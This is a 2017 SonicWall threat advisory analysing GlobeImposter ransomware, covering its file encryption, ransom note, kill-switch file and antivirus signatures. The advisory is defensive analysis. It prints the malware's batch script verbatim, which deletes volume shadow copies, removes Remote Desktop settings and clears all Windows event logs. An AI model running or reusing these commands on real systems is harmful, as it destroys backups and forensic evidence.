SonicWall Security Center
Share: Linkedin Share Facebook Like
Back to SonicALERT


GlobeImposter Ransomware renders system unbootable (Nov 10, 2017)



Description


The SonicWall Capture Labs Threat Research Team have come across ransomware that goes by the name GlobeImposter. It is also known as Fake Globe. GlobeImposter is distributed via a malicious spam campaign and as with all ransomware encrypts the victims files making them irrevocable without payment. Most ransomware have a built in file extension filter that will leave executable files intact. This ransomware however, encrypts executable files and renders the system unbootable as a result.

Infection Cycle:

Upon execution the Trojan makes the following changes to the filesystem and begins its file encryption process:

  • copies itself to %APPDATA%\{original_filename}.exe [Detected as GAV: GlobeImposter.A (Trojan)]
  • creates %ALLUSERSPROFILE%\60091F9FF415A9DD5FDFF0D880249E69F883A75D0242CE20D6E6A90CC5AEAFDE
  • encrypts files and gives them a .TRUE file extension
  • drops how_to_back_files.html into every directory containing encryped files

how_to_back_files.html contains the following html page:

The page contains data on steps needed to recover files. We wrote to true_offensive@aol.com and received the following reply:

If %ALLUSERSPROFILE%\60091F9FF415A9DD5FDFF0D880249E69F883A75D0242CE20D6E6A90CC5AEAFDE already exists, the trojan ceases all operations and exits.

60091F9FF415A9DD5FDFF0D880249E69F883A75D0242CE20D6E6A90CC5AEAFDE contains the following data:

After encrypting files (including .exe files), the Trojan then performs operations to make file restoration difficult. It even clears Windows event logs and removes any saved remote desktop configurations. The following .bat file performs this task before being deleted.

      @echo off
      vssadmin.exe Delete Shadows /All /Quiet
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
      reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
      cd %userprofile%\documents\
      attrib Default.rdp -s -h
      del Default.rdp
      for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"

Since the Trojan encrypts critical system files, it renders the machine unbootable:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Globeimposter.RSM (Trojan)
  • GAV: Globeimposter.RSM_2 (Trojan)
  • GAV: Globeimposter.RSM_3 (Trojan)
  • GAV: Globeimposter.RSM_4 (Trojan)



Back to top

Back to SonicALERT

Follow: Follow us on Facebook Follow us on Twitter Join the Conversation
#SonicWall
© 2017 SonicWall | Privacy Policy | Conditions for use | Feedback | Live Demo | SonicALERT | Document Library | Report Issues
Version: 13.6 | S2MSW02